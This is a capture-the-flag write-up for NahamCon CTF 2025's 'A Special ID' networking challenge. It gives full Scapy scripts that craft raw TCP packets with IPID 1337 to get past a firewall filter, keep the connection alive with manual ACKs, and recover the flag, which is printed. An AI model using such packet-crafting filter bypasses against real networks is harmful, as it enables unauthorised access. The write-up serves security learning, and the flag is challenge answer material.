NahamCon CTF 2025

2025-05-28

I participated in NahamCon CTF 2025, organized by JohnHammond, as a member of my institute’s club, InfoSecIITR. This writeup details the challenge I solved during the competition.

Networking

A Special ID

Challenge Description

483 points - Networking - 60 Solves - hard

Author: @Kkevsterrr

We’ve got a brand new, state of the art firewall here to protect our webserver.
For top of the line protection, only packets with specific IPIDs are allowed.

NOTE: Accessing this challenge by the link below will time out. This connection refused is intentional. The challenge is not broken, and it is your task to understand how to connect to it. Port 8080 is the only port in scope for this challenge.

Connect to this challenge at http://137.184.230.90:8080

Solution

As mentioned in the description, only packets with specific IPIDs are allowed.

The IPID (IP Identification field) is a 16-bit field in the IPv4 header, used to uniquely identify fragments of an original IP datagram. Here's what you need to know about its possible values in a raw packet:

Possible Values for IPID
Range: Since it's a 16-bit field, it can hold values from:
0 to 65535 (0x0000 to 0xFFFF)
So any value between 0 and 65535 can legally appear as the IPID in a raw IPv4 packet.

To exploit this, I began crafting packets using the Scapy Python library with different IPID values. Naturally, I started with 1337, a well-known number in cybersecurity culture. When I sent a SYN packet with IPID 1337, I received a SYN-ACK response with IPID 0.

However, when I sent an ACK packet with an IPID other than 1337, the firewall dropped it. This indicated that only packets with IPID 1337 were permitted beyond the initial handshake. So, I adjusted my approach and sent all packets with a fixed IPID of 1337.

Initial Python Script to Send the Packets

from scapy.all import *
import time

target = "137.184.230.90"
port = 8080
ipid = 1337

# Use a fixed source port to ensure consistency
src_port = 12345
seq = 1000

print(f"[+] Using IPID: {ipid}, Source Port: {src_port}")

# Step 1: SYN
print("[*] Sending SYN...")
ip_syn = IP(dst=target, id=ipid)
syn = TCP(sport=src_port, dport=port, flags="S", seq=seq)

# Show what we're sending
print("[*] SYN packet details:")
(ip_syn/syn).show()

synack = sr1(ip_syn/syn, timeout=5)

if not synack:
    print("[-] No response to SYN.")
    exit()

print("[*] Received SYN-ACK:")
synack.show()

if synack[TCP].flags != 'SA':
    print("[-] Expected SYN-ACK, got something else.")
    exit()

# Calculate proper sequence numbers
ack_seq = seq + 1
ack_ack = synack.seq + 1

print(f"[+] ACK seq: {ack_seq}, ACK ack: {ack_ack}")

# Small delay to ensure proper timing
time.sleep(0.1)

# Step 2: ACK
print("[*] Sending ACK...")
ip_ack = IP(dst=target, id=ipid)
ack = TCP(sport=src_port, dport=port, flags="A", seq=ack_seq, ack=ack_ack)

# Show what we're sending
print("[*] ACK packet details:")
(ip_ack/ack).show()

# Send ACK and immediately listen for response
print("[*] Sending ACK and listening for immediate response...")
response_to_ack = sr1(ip_ack/ack, timeout=2)

if response_to_ack:
    print("[*] Response to ACK:")
    response_to_ack.show()
    if response_to_ack.haslayer(TCP) and response_to_ack[TCP].flags & 0x04:  # RST
        print("[-] Got RST in response to ACK - connection rejected")
        exit()
else:
    print("[+] No immediate RST response to ACK - this is good!")

# Small delay
time.sleep(0.1)

# Step 3: HTTP GET
print("[*] Sending HTTP GET...")
ip_http = IP(dst=target, id=ipid)
http_data = b"GET / HTTP/1.1\r\nHost: 137.184.230.90:8080\r\nConnection: close\r\n\r\n"
psh = TCP(sport=src_port, dport=port, flags="PA", seq=ack_seq, ack=ack_ack)

# Show what we're sending
print("[*] HTTP packet details:")
(ip_http/psh).show()
print(f"[*] HTTP data: {http_data}")

# Send HTTP request
print("[*] Sending HTTP request...")
send(ip_http/psh/http_data)

# Now sniff for the complete HTTP response
print("[*] Sniffing for HTTP response packets...")
response_packets = sniff(filter=f"host {target}", timeout=5)

print(f"[+] Captured {len(response_packets)} response packets:")

http_data_found = False
for i, pkt in enumerate(response_packets):
    print(f"\n--- Packet {i+1} ---")
    # pkt.show()
    
    if pkt.haslayer(Raw):
        raw_data = pkt[Raw].load
        print(f"[+] Raw data ({len(raw_data)} bytes):")
        try:
            decoded = raw_data.decode('utf-8', errors='replace')
            print(decoded)
            if b'flag' in raw_data.lower():
                print("[!] POTENTIAL FLAG FOUND!")
                http_data_found = True
        except:
            print("Binary data:", raw_data[:100])

Output of the initial script:

$ sudo -E python3 ipid.py 
[+] Using IPID: 1337, Source Port: 12345
[*] Sending SYN...
[*] SYN packet details:
###[ IP ]###
  version   = 4
  ihl       = None
  tos       = 0x0
  len       = None
  id        = 1337
  flags     = 
  frag      = 0
  ttl       = 64
  proto     = tcp
  chksum    = None
  src       = 192.168.0.100
  dst       = 137.184.230.90
  \options   \
###[ TCP ]###
     sport     = 12345
     dport     = http_alt
     seq       = 1000
     ack       = 0
     dataofs   = None
     reserved  = 0
     flags     = S
     window    = 8192
     chksum    = None
     urgptr    = 0
     options   = []

Begin emission
.
Finished sending 1 packets
*
Received 2 packets, got 1 answers, remaining 0 packets
[*] Received SYN-ACK:
###[ IP ]###
  version   = 4
  ihl       = 5
  tos       = 0x34
  len       = 44
  id        = 0
  flags     = DF
  frag      = 0
  ttl       = 43
  proto     = tcp
  chksum    = 0x1e79
  src       = 137.184.230.90
  dst       = 192.168.0.100
  \options   \
###[ TCP ]###
     sport     = http_alt
     dport     = 12345
     seq       = 1145002346
     ack       = 1001
     dataofs   = 6
     reserved  = 0
     flags     = SA
     window    = 64240
     chksum    = 0x7abe
     urgptr    = 0
     options   = [('MSS', 1440)]

[+] ACK seq: 1001, ACK ack: 1145002347
[*] Sending ACK...
[*] ACK packet details:
###[ IP ]###
  version   = 4
  ihl       = None
  tos       = 0x0
  len       = None
  id        = 1337
  flags     = 
  frag      = 0
  ttl       = 64
  proto     = tcp
  chksum    = None
  src       = 192.168.0.100
  dst       = 137.184.230.90
  \options   \
###[ TCP ]###
     sport     = 12345
     dport     = http_alt
     seq       = 1001
     ack       = 1145002347
     dataofs   = None
     reserved  = 0
     flags     = A
     window    = 8192
     chksum    = None
     urgptr    = 0
     options   = []

[*] Sending ACK and listening for immediate response...
Begin emission

Finished sending 1 packets
.........
Received 9 packets, got 0 answers, remaining 1 packets
[+] No immediate RST response to ACK - this is good!
[*] Sending HTTP GET...
[*] HTTP packet details:
###[ IP ]###
  version   = 4
  ihl       = None
  tos       = 0x0
  len       = None
  id        = 1337
  flags     = 
  frag      = 0
  ttl       = 64
  proto     = tcp
  chksum    = None
  src       = 192.168.0.100
  dst       = 137.184.230.90
  \options   \
###[ TCP ]###
     sport     = 12345
     dport     = http_alt
     seq       = 1001
     ack       = 1145002347
     dataofs   = None
     reserved  = 0
     flags     = PA
     window    = 8192
     chksum    = None
     urgptr    = 0
     options   = []

[*] HTTP data: b'GET / HTTP/1.1\r\nHost: 137.184.230.90:8080\r\nConnection: close\r\n\r\n'
[*] Sending HTTP request...
.
Sent 1 packets.
[*] Sniffing for HTTP response packets...
[+] Captured 16 response packets:

--- Packet 1 ---

--- Packet 2 ---
[+] Raw data (1072 bytes):
HTTP/1.1 200 OK
Date: Wed, 28 May 2025 12:06:22 GMT
Server: Apache/2.4.63 (Unix)
Last-Modified: Fri, 23 May 2025 14:07:48 GMT
ETag: "7b03-635ce1f7bb500"
Accept-Ranges: bytes
Content-Length: 31491
Connection: close
Content-Type: text/html

Sed ut perspiciatis unde omnis iste natus error sit voluptatem accusantium doloremque laudantium, totam rem aperiam, eaque ipsa quae ab illo inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Nemo enim ipsam voluptatem quia voluptas sit aspernatur aut odit aut fugit, sed quia consequuntur magni dolores eos qui ratione voluptatem sequi nesciunt. Neque porro quisquam est, qui dolorem ipsum quia dolor sit amet, consectetur, adipisci velit, sed quia non numquam eius modi tempora incidunt ut labore et dolore magnam aliquam quaerat voluptatem. Ut enim ad minima veniam, quis nostrum exercitationem ullam corporis suscipit laboriosam, nisi ut aliquid ex ea commodi consequatur? Quis autem vel eum iure reprehenderit qui in ea voluptate velit esse quam nihil molestiae consequatur, vel illum qui dolor
...

Despite establishing the connection, I didn’t receive the flag on the first attempt. I noticed that I was only receiving 5360 bytes, whereas the Content-Length header indicated 31491 bytes (~31.5 KB). This suggested the connection was getting terminated too early.

To address this, I modified the script to continuously send ACK packets to keep the TCP connection alive until the full content was received.

Modified Script:

from scapy.all import *
import time
import re

target = "137.184.230.90"
port = 8080
ipid = 1337
src_port = 12345
seq = 1000

print(f"[+] Using IPID: {ipid}, Source Port: {src_port}")

# Step 1: SYN
print("[*] Sending SYN...")
ip_syn = IP(dst=target, id=ipid)
syn = TCP(sport=src_port, dport=port, flags="S", seq=seq)

synack = sr1(ip_syn/syn, timeout=5)
if not synack:
    print("[-] No response to SYN.")
    exit()

print("[*] Received SYN-ACK")
if synack[TCP].flags != 'SA':
    print("[-] Expected SYN-ACK, got something else.")
    exit()

# Calculate proper sequence numbers
ack_seq = seq + 1
ack_ack = synack.seq + 1
print(f"[+] ACK seq: {ack_seq}, ACK ack: {ack_ack}")

time.sleep(0.1)

# Step 2: ACK
print("[*] Sending ACK...")
ip_ack = IP(dst=target, id=ipid)
ack = TCP(sport=src_port, dport=port, flags="A", seq=ack_seq, ack=ack_ack)

response_to_ack = sr1(ip_ack/ack, timeout=2)
if response_to_ack:
    if response_to_ack.haslayer(TCP) and response_to_ack[TCP].flags & 0x04:  # RST
        print("[-] Got RST in response to ACK - connection rejected")
        exit()
else:
    print("[+] No immediate response to ACK - this is good!")

time.sleep(0.1)

# Step 3: HTTP GET
print("[*] Sending HTTP GET...")
ip_http = IP(dst=target, id=ipid)
http_data = b"GET / HTTP/1.1\r\nHost: 137.184.230.90:8080\r\nConnection: close\r\n\r\n"
psh = TCP(sport=src_port, dport=port, flags="PA", seq=ack_seq, ack=ack_ack)

print("[*] Sending HTTP request...")
send(ip_http/psh/http_data)

# Global variables for TCP state management
current_ack = ack_ack
my_seq = ack_seq + len(http_data)
received_data = b""
content_length = None
headers_complete = False
capture_active = True
packets_received = 0
tcp_segments = {}  # Store out-of-order segments
expected_seq = ack_ack

def send_ack(ack_num):
    """Send an ACK packet to acknowledge received data"""
    global my_seq
    ack_pkt = IP(dst=target, id=ipid) / TCP(
        sport=src_port, 
        dport=port, 
        flags="A", 
        seq=my_seq, 
        ack=ack_num,
        window=65535  # Large window size
    )
    send(ack_pkt, verbose=0)
    print(f"[*] Sent ACK: seq={my_seq}, ack={ack_num}")

def process_response_packet(pkt):
    """Process incoming TCP packets and send ACKs"""
    global current_ack, received_data, content_length, headers_complete, capture_active, packets_received, tcp_segments, expected_seq
    
    if (pkt.haslayer(IP) and pkt.haslayer(TCP) and 
        pkt[IP].src == target and pkt[TCP].sport == port and 
        pkt[TCP].dport == src_port):
        
        packets_received += 1
        tcp_layer = pkt[TCP]
        
        # Check for data
        if pkt.haslayer(Raw):
            data = pkt[Raw].load
            tcp_seq = tcp_layer.seq
            
            print(f"[*] Packet {packets_received}: seq={tcp_seq}, len={len(data)}, expected_seq={expected_seq}")
            
            # Store the segment regardless of order
            tcp_segments[tcp_seq] = data
            
            # Always send ACK for received data to keep connection alive
            ack_for_this_packet = tcp_seq + len(data)
            send_ack(ack_for_this_packet)
            
            # Try to reassemble consecutive data
            reassemble_data()
            
            # Check if we have all data
            if headers_complete and content_length:
                headers_end = received_data.find(b'\r\n\r\n') + 4
                body_length = len(received_data) - headers_end
                print(f"[*] Body progress: {body_length}/{content_length} bytes ({body_length/content_length*100:.1f}%)")
                
                if body_length >= content_length:
                    print("[+] All data received!")
                    capture_active = False
                    return True
        
        # Handle connection close - but don't stop immediately, try to get more data
        if tcp_layer.flags & 0x01:  # FIN
            print("[*] FIN received - server wants to close connection")
            # Send ACK for FIN but don't close immediately
            send_ack(tcp_layer.seq + 1)
            # Don't send our own FIN yet, try to get more data
            print("[*] Continuing to wait for more data...")
            
        if tcp_layer.flags & 0x04:  # RST
            print("[*] RST received - connection reset")
            capture_active = False
            return True
    
    return False

def reassemble_data():
    """Reassemble TCP segments in order"""
    global received_data, expected_seq, headers_complete, content_length
    
    # Try to find consecutive segments starting from expected_seq
    temp_data = received_data
    current_expected = expected_seq
    
    while current_expected in tcp_segments:
        segment_data = tcp_segments[current_expected]
        temp_data += segment_data
        current_expected += len(segment_data)
        # Remove processed segment
        del tcp_segments[current_expected - len(segment_data)]
    
    # Update global state
    received_data = temp_data
    expected_seq = current_expected
    
    # Parse headers if not done yet
    if not headers_complete and b'\r\n\r\n' in received_data:
        headers_end = received_data.find(b'\r\n\r\n') + 4
        headers = received_data[:headers_end]
        
        print("[+] Headers parsed!")
        headers_str = headers.decode('utf-8', errors='replace')
        content_match = re.search(r'Content-Length:\s*(\d+)', headers_str, re.IGNORECASE)
        if content_match:
            content_length = int(content_match.group(1))
            print(f"[+] Content-Length: {content_length}")
        
        headers_complete = True

# Start active packet capture with response processing
print("[*] Starting active TCP capture...")
print("[*] Will send ACKs for received data to keep connection alive")

# Use a custom sniffing approach with timeout and active ACK sending
start_time = time.time()
timeout_duration = 180  # 3 minutes timeout

# Sniff packets and process them
try:
    packets = sniff(
        filter=f"host {target} and port {port}",
        stop_filter=process_response_packet,
        timeout=timeout_duration
    )
except KeyboardInterrupt:
    print("\n[*] Interrupted by user")
    capture_active = False

# Try to get any remaining out-of-order packets
if tcp_segments:
    print(f"[*] Processing {len(tcp_segments)} out-of-order segments...")
    reassemble_data()

print(f"\n[+] Capture completed!")
print(f"[+] Total packets received: {packets_received}")
print(f"[+] Total data received: {len(received_data)} bytes")

if content_length:
    print(f"[+] Expected: {content_length} bytes")
    headers_end = received_data.find(b'\r\n\r\n') + 4
    body_length = len(received_data) - headers_end
    print(f"[+] Body received: {body_length} bytes ({body_length/content_length*100:.1f}%)")

# Save all received data to file
timestamp = int(time.time())
filename = f"http_response_{timestamp}.txt"

print(f"\n[*] Saving complete response to {filename}")
with open(filename, 'w', encoding='utf-8', errors='replace') as f:
    try:
        full_text = received_data.decode('utf-8', errors='replace')
        f.write(full_text)
        print(f"[+] Saved {len(full_text)} characters to {filename}")
    except Exception as e:
        print(f"[!] Error saving as text: {e}")

# If we didn't get all data, try one more aggressive capture
if content_length and len(received_data) - received_data.find(b'\r\n\r\n') - 4 < content_length:
    print(f"\n[*] Missing data detected. Trying additional capture...")
    print(f"[*] Making another request to get remaining data...")
    
    # Make another request (servers sometimes have issues with single requests)
    time.sleep(1)
    send(ip_http/psh/http_data)
    
    # Capture for a shorter time
    additional_packets = sniff(
        filter=f"src host {target} and src port {port}",
        timeout=30,
        count=50
    )
    
    print(f"[*] Captured {len(additional_packets)} additional packets")
    
    # Process additional packets
    for pkt in additional_packets:
        if pkt.haslayer(Raw):
            # This is a simple append - in production you'd want proper TCP reassembly
            additional_data = pkt[Raw].load
            # Only add if it looks like new data
            if additional_data not in received_data:
                received_data += additional_data
                print(f"[*] Added {len(additional_data)} bytes of additional data")
    
    # Save updated data
    updated_filename = f"http_response_updated_{timestamp}.txt"
    with open(updated_filename, 'w', encoding='utf-8', errors='replace') as f:
        try:
            full_text = received_data.decode('utf-8', errors='replace')
            f.write(full_text)
            print(f"[+] Saved updated response ({len(full_text)} chars) to {updated_filename}")
        except Exception as e:
            print(f"[!] Error saving updated text: {e}")

# Process the complete response
if b'\r\n\r\n' in received_data:
    headers_end = received_data.find(b'\r\n\r\n') + 4
    headers = received_data[:headers_end]
    body = received_data[headers_end:]
    
    print("\n[+] HTTP Headers:")
    print(headers.decode('utf-8', errors='replace'))
    
    print(f"\n[+] HTTP Response Body ({len(body)} bytes):")
    
    try:
        body_text = body.decode('utf-8', errors='replace')
        
        # Enhanced flag detection
        flag_patterns = [
            r'flag\{[^}]+\}',
            r'FLAG\{[^}]+\}'
        ]
        
        flags_found = []
        for pattern in flag_patterns:
            matches = re.findall(pattern, body_text, re.IGNORECASE)
            flags_found.extend(matches)
        
        if flags_found:
            print("[!] POTENTIAL FLAGS FOUND:")
            for flag in sorted(set(flags_found)):
                print(f"    {flag}")
        # Display sample of content
        print(f"\n[*] First 1000 characters:")
        print(body_text[:1000])
        
        if len(body_text) > 2000:
            print(f"\n[*] Last 1000 characters:")  
            print(body_text[-1000:])
            
    except Exception as e:
        print(f"[*] Could not decode body as text: {e}")
        print(f"[*] Raw body (first 500 bytes): {body[:500]}")

print("\n[*] Script executed")

Output of the modified script:

$ sudo -E python3 ipid.py 
[+] Using IPID: 1337, Source Port: 12345
[*] Sending SYN...
Begin emission
.
Finished sending 1 packets
*
Received 2 packets, got 1 answers, remaining 0 packets
[*] Received SYN-ACK
[+] ACK seq: 1001, ACK ack: 1710788324
[*] Sending ACK...
Begin emission

Finished sending 1 packets
.
Received 1 packets, got 0 answers, remaining 1 packets
[+] No immediate response to ACK - this is good!
[*] Sending HTTP GET...
[*] Sending HTTP request...
.
Sent 1 packets.
[*] Starting active TCP capture...
[*] Will send ACKs for received data to keep connection alive
[*] Packet 2: seq=1710788324, len=1072, expected_seq=1710788324
[*] Sent ACK: seq=1065, ack=1710789396
[+] Headers parsed!
[+] Content-Length: 31491
[*] Body progress: 823/31491 bytes (2.6%)
[*] Packet 3: seq=1710789396, len=1072, expected_seq=1710789396
[*] Sent ACK: seq=1065, ack=1710790468
[*] Body progress: 1895/31491 bytes (6.0%)
[*] Packet 4: seq=1710790468, len=1072, expected_seq=1710790468
[*] Sent ACK: seq=1065, ack=1710791540
[*] Body progress: 2967/31491 bytes (9.4%)
[*] Packet 5: seq=1710791540, len=1072, expected_seq=1710791540
[*] Sent ACK: seq=1065, ack=1710792612
[*] Body progress: 4039/31491 bytes (12.8%)
[*] Packet 6: seq=1710792612, len=536, expected_seq=1710792612
[*] Sent ACK: seq=1065, ack=1710793148
[*] Body progress: 4575/31491 bytes (14.5%)
[*] Packet 7: seq=1710793148, len=536, expected_seq=1710793148
[*] Sent ACK: seq=1065, ack=1710793684
[*] Body progress: 5111/31491 bytes (16.2%)
[*] Packet 8: seq=1710793684, len=536, expected_seq=1710793684
[*] Sent ACK: seq=1065, ack=1710794220
[*] Body progress: 5647/31491 bytes (17.9%)
[*] Packet 9: seq=1710794220, len=536, expected_seq=1710794220
[*] Sent ACK: seq=1065, ack=1710794756
[*] Body progress: 6183/31491 bytes (19.6%)
[*] Packet 10: seq=1710794756, len=1072, expected_seq=1710794756
[*] Sent ACK: seq=1065, ack=1710795828
[*] Body progress: 7255/31491 bytes (23.0%)
[*] Packet 11: seq=1710795828, len=1072, expected_seq=1710795828
[*] Sent ACK: seq=1065, ack=1710796900
[*] Body progress: 8327/31491 bytes (26.4%)
[*] Packet 12: seq=1710796900, len=1072, expected_seq=1710796900
[*] Sent ACK: seq=1065, ack=1710797972
[*] Body progress: 9399/31491 bytes (29.8%)
[*] Packet 13: seq=1710797972, len=1072, expected_seq=1710797972
[*] Sent ACK: seq=1065, ack=1710799044
[*] Body progress: 10471/31491 bytes (33.3%)
[*] Packet 14: seq=1710799044, len=1072, expected_seq=1710799044
[*] Sent ACK: seq=1065, ack=1710800116
[*] Body progress: 11543/31491 bytes (36.7%)
[*] Packet 15: seq=1710800116, len=536, expected_seq=1710800116
[*] Sent ACK: seq=1065, ack=1710800652
[*] Body progress: 12079/31491 bytes (38.4%)
[*] Packet 16: seq=1710800652, len=536, expected_seq=1710800652
[*] Sent ACK: seq=1065, ack=1710801188
[*] Body progress: 12615/31491 bytes (40.1%)
[*] Packet 17: seq=1710801188, len=536, expected_seq=1710801188
[*] Sent ACK: seq=1065, ack=1710801724
[*] Body progress: 13151/31491 bytes (41.8%)
[*] Packet 18: seq=1710801724, len=536, expected_seq=1710801724
[*] Sent ACK: seq=1065, ack=1710802260
[*] Body progress: 13687/31491 bytes (43.5%)
[*] Packet 19: seq=1710802260, len=1072, expected_seq=1710802260
[*] Sent ACK: seq=1065, ack=1710803332
[*] Body progress: 14759/31491 bytes (46.9%)
[*] Packet 20: seq=1710803332, len=1072, expected_seq=1710803332
[*] Sent ACK: seq=1065, ack=1710804404
[*] Body progress: 15831/31491 bytes (50.3%)
[*] Packet 21: seq=1710804404, len=1072, expected_seq=1710804404
[*] Sent ACK: seq=1065, ack=1710805476
[*] Body progress: 16903/31491 bytes (53.7%)
[*] Packet 22: seq=1710805476, len=1072, expected_seq=1710805476
[*] Sent ACK: seq=1065, ack=1710806548
[*] Body progress: 17975/31491 bytes (57.1%)
[*] Packet 23: seq=1710806548, len=536, expected_seq=1710806548
[*] Sent ACK: seq=1065, ack=1710807084
[*] Body progress: 18511/31491 bytes (58.8%)
[*] Packet 24: seq=1710807084, len=536, expected_seq=1710807084
[*] Sent ACK: seq=1065, ack=1710807620
[*] Body progress: 19047/31491 bytes (60.5%)
[*] Packet 25: seq=1710807620, len=1072, expected_seq=1710807620
[*] Sent ACK: seq=1065, ack=1710808692
[*] Body progress: 20119/31491 bytes (63.9%)
[*] Packet 26: seq=1710808692, len=1072, expected_seq=1710808692
[*] Sent ACK: seq=1065, ack=1710809764
[*] Body progress: 21191/31491 bytes (67.3%)
[*] Packet 27: seq=1710809764, len=1072, expected_seq=1710809764
[*] Sent ACK: seq=1065, ack=1710810836
[*] Body progress: 22263/31491 bytes (70.7%)
[*] Packet 28: seq=1710810836, len=1072, expected_seq=1710810836
[*] Sent ACK: seq=1065, ack=1710811908
[*] Body progress: 23335/31491 bytes (74.1%)
[*] Packet 29: seq=1710811908, len=536, expected_seq=1710811908
[*] Sent ACK: seq=1065, ack=1710812444
[*] Body progress: 23871/31491 bytes (75.8%)
[*] Packet 30: seq=1710812444, len=536, expected_seq=1710812444
[*] Sent ACK: seq=1065, ack=1710812980
[*] Body progress: 24407/31491 bytes (77.5%)
[*] Packet 31: seq=1710812980, len=1072, expected_seq=1710812980
[*] Sent ACK: seq=1065, ack=1710814052
[*] Body progress: 25479/31491 bytes (80.9%)
[*] Packet 32: seq=1710814052, len=1072, expected_seq=1710814052
[*] Sent ACK: seq=1065, ack=1710815124
[*] Body progress: 26551/31491 bytes (84.3%)
[*] Packet 33: seq=1710815124, len=1072, expected_seq=1710815124
[*] Sent ACK: seq=1065, ack=1710816196
[*] Body progress: 27623/31491 bytes (87.7%)
[*] Packet 34: seq=1710816196, len=1072, expected_seq=1710816196
[*] Sent ACK: seq=1065, ack=1710817268
[*] Body progress: 28695/31491 bytes (91.1%)
[*] Packet 35: seq=1710817268, len=1072, expected_seq=1710817268
[*] Sent ACK: seq=1065, ack=1710818340
[*] Body progress: 29767/31491 bytes (94.5%)
[*] Packet 36: seq=1710818340, len=1072, expected_seq=1710818340
[*] Sent ACK: seq=1065, ack=1710819412
[*] Body progress: 30839/31491 bytes (97.9%)
[*] Packet 37: seq=1710819412, len=652, expected_seq=1710819412
[*] Sent ACK: seq=1065, ack=1710820064
[*] Body progress: 31491/31491 bytes (100.0%)
[+] All data received!

[+] Capture completed!
[+] Total packets received: 37
[+] Total data received: 31740 bytes
[+] Expected: 31491 bytes
[+] Body received: 31491 bytes (100.0%)

[*] Saving complete response to http_response_1748338637.txt
[+] Saved 31740 characters to http_response_1748338637.txt

[+] HTTP Headers:
HTTP/1.1 200 OK
Date: Tue, 27 May 2025 09:37:16 GMT
Server: Apache/2.4.63 (Unix)
Last-Modified: Fri, 23 May 2025 14:07:48 GMT
ETag: "7b03-635ce1f7bb500"
Accept-Ranges: bytes
Content-Length: 31491
Connection: close
Content-Type: text/html

[+] HTTP Response Body (31491 bytes):
[!] POTENTIAL FLAGS FOUND:
    flag{4e3dd38dcd14821aa327e2c96af2799d}

[*] First 1000 characters:
Sed ut perspiciatis unde omnis iste natus error sit voluptatem accusantium doloremque laudantium, totam rem aperiam, eaque ipsa quae ab illo inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. Nemo enim ipsam voluptatem quia voluptas sit aspernatur aut odit aut fugit, sed quia consequuntur magni dolores eos qui ratione voluptatem sequi nesciunt. Neque porro quisquam est, qui dolorem ipsum quia dolor sit amet, consectetur, adipisci velit, sed quia non numquam eius modi tempora incidunt ut labore et dolore magnam aliquam quaerat voluptatem. Ut enim ad minima veniam, quis nostrum exercitationem ullam corporis suscipit laboriosam, nisi ut aliquid ex ea commodi consequatur? Quis autem vel eum iure reprehenderit qui in ea voluptate velit esse quam nihil molestiae consequatur, vel illum qui dolorem eum fugiat quo voluptas nulla pariatur?
Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad

[*] Last 1000 characters:
itur porta porta nulla, sit amet suscipit nisi ornare in. Etiam pharetra vitae lacus in mollis. Suspendisse gravida erat lectus, non suscipit lacus vulputate vel. Proin ut nibh feugiat, mollis nunc id, semper sapien. Ut cursus orci purus, quis viverra nisi dapibus quis. Curabitur faucibus porttitor ex at pulvinar. Ut facilisis purus eget enim blandit bibendum. Vivamus vehicula non ligula vitae eleifend.

Phasellus ac libero turpis. Nunc dictum magna vehicula, vestibulum mauris eu, congue ex. Integer leo sem, mattis non neque a, semper rutrum nisi. Proin lobortis leo venenatis ornare imperdiet. Donec ut cursus eros. Maecenas quis malesuada odio. Etiam quis commodo ante. Suspendisse varius dui ac lacus maximus, in pharetra dolor laoreet. Praesent est urna, pretium non fringilla pretium, finibus vel magna. Integer ultrices sit amet sapien cursus pretium. Etiam suscipit ipsum in facilisis suscipit. Cras interdum urna sed nisl suscipit interdum.

fin: flag{4e3dd38dcd14821aa327e2c96af2799d}


[*] Script executed

Flag

1	flag{4e3dd38dcd14821aa327e2c96af2799d}